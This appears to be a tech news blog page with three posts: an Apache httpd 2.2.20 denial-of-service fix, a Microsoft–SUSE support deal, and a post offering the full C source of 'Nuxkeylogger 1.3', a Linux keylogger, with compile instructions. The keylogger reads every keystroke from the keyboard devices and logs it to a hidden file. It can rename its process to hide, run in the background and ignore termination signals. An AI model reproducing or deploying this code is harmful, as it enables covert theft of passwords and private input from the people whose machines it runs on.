This afternoon the Apache Foundation released an awaited fix to the denial of service (DoS) vulnerability reported a few days ago. The fixes in version 2.2.20 of the Apache httpd server reduce the amount of memory that is used by range requests. If the total bytes of a file requested exceed the total file size, httpd will return the entire file. This follows closely on the heels of a tool released to the Full Disclosure mailing list this week that exploits the flaw. Apache web administrators are encouraged to apply this fix immediately. Unfortunately, as we see all too frequently, many Linux and Unix administrators "set and forget" their installations and never bother to look after their servers.
The Apache team should be applauded for testing and releasing an important security fix so quickly. Now it is up to you, the IT administrators who are using Apache, to follow through and apply these fixes.

For More information, to see the official release of Apache notes and patches of that vulnerability click Here

-News Source (NS & Apache)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft & SuSe Alliance (MS is Purchasing $100 Million of Support from SuSe)


Despite the problematic relationship between Microsoft and Linux vendors over the years, it’s not always been a case of frosty relationships.  Previously Microsoft decided to work closely with Novell on the Enterprise version of SUSE Linux, and now the company has renewed their alliance with SUSE by purchasing $100 million of support.
This support will be for Windows enterprise customers who are also running a SUSE machines in conjunction with their Windows boxes.  It’s a good move on the part of Microsoft to avoid upsetting business customers who are already feeling squeezed with extremely tight profit margins and software assurance costs to the Redmond giant.  The move will mean these enterprise customers won’t have to pay for further Linux support.

In a press release Microsoft said… 
”As IT operating environments become increasingly consumerized, cloud-based and automated, there is an implicit expectation that the underlying technologies from multiple vendors should work together. For this reason, the collaborative relationship between Microsoft and SUSE has come to be viewed as a model for the industry.  The joint Microsoft-SUSE collaboration has served more than 725 customers worldwide across a range of industries, such as manufacturing, oil and gas, healthcare, and financial services.”

“Our collaboration with SUSE not only helps customers to achieve success today, but also seeks to provide them with a solid foundation for tomorrow,” said Sandy Gupta, general manager of the Open Solutions Group at Microsoft. “Through our continued engagement on the technical side, an outstanding support offering from SUSE and our ability to provide mutual IP assurance, we feel confident that we will be able to deliver core value to those running mixed-source IT environments well into the future – and into the cloud.”


This move doesn’t mean that Microsoft will stop complaining about Linux or even stop suing for patent infringement, as these are just what the technology industry does (probably at the request of lawyers needing to justify their sky-high salaries).  It’s further evidence though that, deep down, technology companies around the world are more interested in building better experiences for their customers than they are feathering their own nests.

This is something I have always felt sets the tech world apart from other industries such as finance or energy.  It’s a good move and both Microsoft and Novell should be applauded for working together again.

-News Source (Ghacks)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

NUXKEYLOGGER VERSION 1.3 (Key Logger For LINUX)


NUXKEYLOGGER VERSION 1.3  is an effective Key Logger For LINUX systems. 

Brief Description:- 
Nux Keylogger monitors keyboard activity on a Linux system.  It's possible to hide and daemonize this process and it supports azerty and qwerty keyboard modes.

Author:- Vilmain Nicolas (C) 2010, 2011 (null.sim@gmail.com)

Licence:-


This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program.  If not, see <http://www.gnu.org/licenses/>.


Source Code of Nuxkeylogger Version 1.3:-

#include  <fcntl.h>
#include  <errno.h>
#include  <stdio.h>
#include  <unistd.h>
#include  <getopt.h>
#include  <stdlib.h>
#include  <string.h>
#include  <signal.h>
#include  <dirent.h>
#include  <sys/select.h>
#include  <linux/input.h>

#define DF_PATH_LOG             "/tmp/.Xsys"
#define PATH_KEYBOARD_FILE      "/dev/input/by-path/"
#define VERSION_STR             "nuxkeylogger version 1.3"
#define PATH_LEN                1024

#define  SIZE_TAB_KEY_AZERTY   sizeof (tab_key_azerty)
#define  SIZE_TAB_KEY_QWERTY   sizeof (tab_key_qwerty)

struct fdlist_s
  {
    int *fdtab;
    int n;
    int *p_lastfd;
    int fdlog;
  };

void    checkuid (void);
void    decode_nuxkeylogger_options (int argc, char **argv, char **pathlog);
void    version (void);
void    usage (void);
void    out_memory (const char *type);
char *  xstrdup (const char *str);
void    hide (int argc, char **argv, const char *name);
void    block_signal (void);
void    daemonize (void);
int     get_keyboard_fd (struct fdlist_s *fl);
int     open_fd_log (char *pathlog, int *fd);
void    loop_keyboard_key (struct fdlist_s *fl);
int     write_key (int fd, int fdlog);
void    free_fdlist (struct fdlist_s *fl);

static const char *tab_key_azerty[] =
  {
     "<ESC>", "&", "é", "\"", "'", "(", "-", "è", "_",
     "ç", "à ", ")", "=", "<BACKSPACE>", "<TAB>", "a",
     "z", "e", "r", "t", "y", "u", "i", "o","p", "^",
     "$", "<ENTER>\n", "<CTRL>", "q", "s", "d", "f", "g", "h",
     "j", "k", "l", "m", "ù", "²", "<SHIFT>", "*", "w",
     "x", "c", "v", "b", "n", ",", ";", ":", "!", "<SHIFT>",
     "*", "<ALT>", " ", "", "<F1>", "<F2>", "<F4>",
     "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>", "",
     "<VerNum>", "", "7", "8", "9", "-", "4", "5", "6",
     "+", "1", "2", "3", "0", "<?>", "", "", "<", "<F11>",
     "<F12>", "", "", "", "", "", "", "", "", "", "/", "",
     "<ALTGr>", "", "", "<Up>", "<UP>", "<Left>", "<Right>",
     "<END>", "<Down>", "<DOWN>", "", "<DEL>", "", "", "",
     "", "", "", "", "", "", "", "", "", "", "<META>"
  };

static const char *tab_key_qwerty[] =
  {
    "<ESC>", "!", "@", "#", "$", "%", "^", "&", "*",
    "(", ")", "_", "=", "<BACKSPACE>", "<TAB>", "q",
    "w", "e", "r", "t", "y", "u", "i", "o", "p",
    "[", "]", "<ENTER>\n", "<CTRL-LEFT>", "a", "s", "d",
    "f", "g", "h", "j", "k", "l", ";", "'", "`", "",
    "\\", "z", "x", "c", "v", "b", "n", "m", ",", "",
    "", "", "", "ALT", " ", "", "<F1>", "<F2>", "<F3>",
    "<F4>", "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>",
    "", "", "7","8", "9", "-", "4", "5", "6", "+", "1", "2",
    "3", "0", ".", "", "", "<", "<F11>", "<F12>", "", "",
    "", "", "", "", "", "<ENTER-RIGHT>", "<CTRL-RIGHT>", "",
    "", "<AltGR>",  "", "", "<Up>", "", "<LEFT>", "", "<RIGHT>",
    "", "<DOWN>", "", "", "", "", "", "", "", ""
  };

char **tab_key;

int
main (int argc, char **argv)
{
  struct fdlist_s fl;
  char *pathlog = NULL;

  checkuid ();
  memset (&fl, 0, sizeof (struct fdlist_s));
  fl.fdlog = -1;
  tab_key = (char **) tab_key_azerty;
  decode_nuxkeylogger_options (argc, argv, &pathlog);
  if (get_keyboard_fd (&fl)
      || open_fd_log (pathlog, &fl.fdlog) == -1)
    {
      free_fdlist (&fl);
      return EXIT_FAILURE;
    }
  loop_keyboard_key (&fl);
  free_fdlist (&fl);
  return EXIT_SUCCESS;
}

void
checkuid (void)
{
  if (getuid ())
    {
      fprintf (stderr, "WARNING: need root!\n");
      exit (EXIT_SUCCESS);
    }
}


void
decode_nuxkeylogger_options (int argc, char **argv, char **pathlog)
{
  char   opt;
  char   *name = NULL;
  static struct option const long_options[] =
    {
      {"help",           no_argument, 0,        'h'},
      {"version",        no_argument, 0,        'v'},
      {"daemonize",      no_argument, 0,        'd'},
      {"block-signals",  no_argument, 0,        's'},
      {"mode-qwerty",    no_argument, 0,        'Q'},
      {"mode-azerty",    no_argument, 0,        'A'},
      {"hidden",         required_argument, 0,  'i'},
      {"path-log",       required_argument, 0,  'p'},
      {0,                0,                 0,   0}
    };

  do
    {
      opt = getopt_long (argc, argv, "hvdsAQi:p:", long_options, NULL);
      switch (opt)
    {
    case 'h':
      usage ();
      break;
    case 'v':
      version ();
      break;
    case 'i':
      name = argv[optind - 1];
      break;
    case 'd':
      daemonize ();
      break;
    case 's':
      block_signal ();
      break;
    case 'A':
      tab_key = (char **) tab_key_azerty;
      break;
    case 'Q':
      tab_key = (char **) tab_key_qwerty;
      break;
    case 'p':
      *pathlog = xstrdup (optarg);
      break;
    }
    }
  while (opt != -1);
  if (name)
    hide (argc, argv, name);
}

void
version (void)
{
  puts (VERSION_STR);
  exit (EXIT_SUCCESS);
}

void
usage (void)
{
  printf ("Warning, in \"qwerty\" mode, it's possibility to error key-mapp\n"
      "arguments list:\n\r"
      "   -H, --help                  print usage and exit program\n\r"
      "   -V, --version               print program_version and exit\r\n"
      "   -d, --daemonize             exec program in background\r\n"
      "   -s, --block-signal          block all signal\r\n"
      "   -Q, --mode-qwerty           keyboard in qwerty mode\r\n"
      "   -A, --mode-azerty           keyboard in azerty mode"
      "(by default)\r\n"
      "   -i, --hidden [NEW NAME]     change program name\r\n"
      "   -p, --path-log [PATH]       name for output log file\r\n");
  exit (EXIT_SUCCESS);
}

void
out_memory (const char *type)
{
  fprintf (stderr, "%s: memory exhausted\n", type);
  exit (EXIT_FAILURE);
}

char *
xstrdup (const char *str)
{
  char *copy = NULL;

  copy = strdup (str);
  if (!copy)
    out_memory ("strdup");
  return copy;
}
   
void
hide (int argc, char **argv, const char *name)
{
  char  *newname = NULL;

  newname = xstrdup (name);
  for (; argc; argc--)
    memset (argv[argc - 1], 0, strlen (argv[argc - 1]));
  strcpy (argv[0], newname);
  free (newname);
}

void
block_signal (void)
{
  int *p_sig = NULL;
  static const int sigtab[] =
    {
      SIGUSR1, SIGUSR2, SIGINT, SIGPIPE, SIGQUIT,
      SIGTERM, SIGTSTP, SIGHUP, SIGILL, SIGABRT,
      SIGFPE, SIGSEGV, SIGALRM, SIGCHLD, SIGCONT,
      SIGTTIN, SIGTTOU, 0
    };
 
  p_sig = (int *) sigtab;
  do
    signal (*p_sig, SIG_IGN);
  while (*++p_sig);
}

void
daemonize (void)
{
  pid_t pid;

  pid = fork ();
  if (pid == -1)
    {
      perror ("fork");
      exit (EXIT_FAILURE);
    }
  else if (pid)
    exit (EXIT_SUCCESS);
}

int
get_keyboard_fd (struct fdlist_s *fl)
{
  struct dirent *ent = NULL;
  DIR *dir = NULL;
  char path[PATH_LEN];

  dir = opendir (PATH_KEYBOARD_FILE);
  if (!dir)
    {
      fprintf (stderr, "opendir: %s\n", strerror (errno));
      return -1;
    }
  for (;;)
    {
      ent = readdir (dir);
      if (!ent)
    break;
      if (strstr(ent->d_name, "-kbd"))
    {
      memset (path, 0, PATH_LEN);
      snprintf (path, (PATH_LEN - 1), "%s%s",
            PATH_KEYBOARD_FILE, ent->d_name);
      fl->n++;
      fl->fdtab = realloc (fl->fdtab, (fl->n * sizeof (int)));
      fl->fdtab[fl->n - 1] = open (path, O_RDONLY);
      if (fl->fdtab[fl->n - 1] == -1)
        {
          fprintf (stderr, "open(%s): %s", path, strerror (errno));
          closedir (dir);
          return -1;
        }
    }
    }
  closedir (dir);
  fl->p_lastfd = &fl->fdtab[fl->n - 1];
  return 0;
}

int
open_fd_log (char *pathlog, int *fd)
{
  char *p_log = NULL;

  p_log = (pathlog) ? pathlog : DF_PATH_LOG;
  *fd = open (p_log, O_WRONLY | O_CREAT | O_APPEND);
  if (*fd == -1)
    fprintf (stderr, "open(%s): %s\n", p_log, strerror (errno));
  if (pathlog)
    free (pathlog);
  return *fd;
}

void
free_fdlist (struct fdlist_s *fl)
{
  int i;

  if (fl->fdtab)
    {
      for (i = 0; i < fl->n; i++)
    {
      if (fl->fdtab[i] != -1)
        close (fl->fdtab[i]);
    }
      free (fl->fdtab);
    }
  if (fl->fdlog != -1)
    close (fl->fdlog);
}

void
loop_keyboard_key (struct fdlist_s *fl)
{
  int n;
  int ret;
  fd_set setread;

  for (;;)
    {
      FD_ZERO (&setread);
      for (n = 0; n < fl->n; n++)
    FD_SET (fl->fdtab[n], &setread);
      ret = select (*fl->p_lastfd + 1, &setread, NULL, NULL, NULL);
      if (ret == -1)
    return;
      else if (ret)
    {
      for (n = 0; n < fl->n; n++)
        if (FD_ISSET (fl->fdtab[n], &setread))
          {
        if (write_key (fl->fdtab[n], fl->fdlog) == -1)
          return;
          }
    }
    }
}

int
write_key (int fd, int fdlog)
{
  struct input_event ev;
  char *key = NULL;

  if (read(fd, &ev, sizeof(struct input_event))
      == sizeof(struct input_event))
    {
      if ((ev.value == EV_KEY || ev.value == 2)
      && (ev.code - 1) > -1 && (ev.code - 1) < 118)
    {
      key = tab_key[ev.code - 1];
      if (write (fdlog, key, strlen (key)) == -1)
        return -1;
    }
    }
  return 0;
}


For Installation:- 

$ gcc -o nuxkeylogger nuxkeylogger.c -W -Wall 
# ./nuxkeylogger --help

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...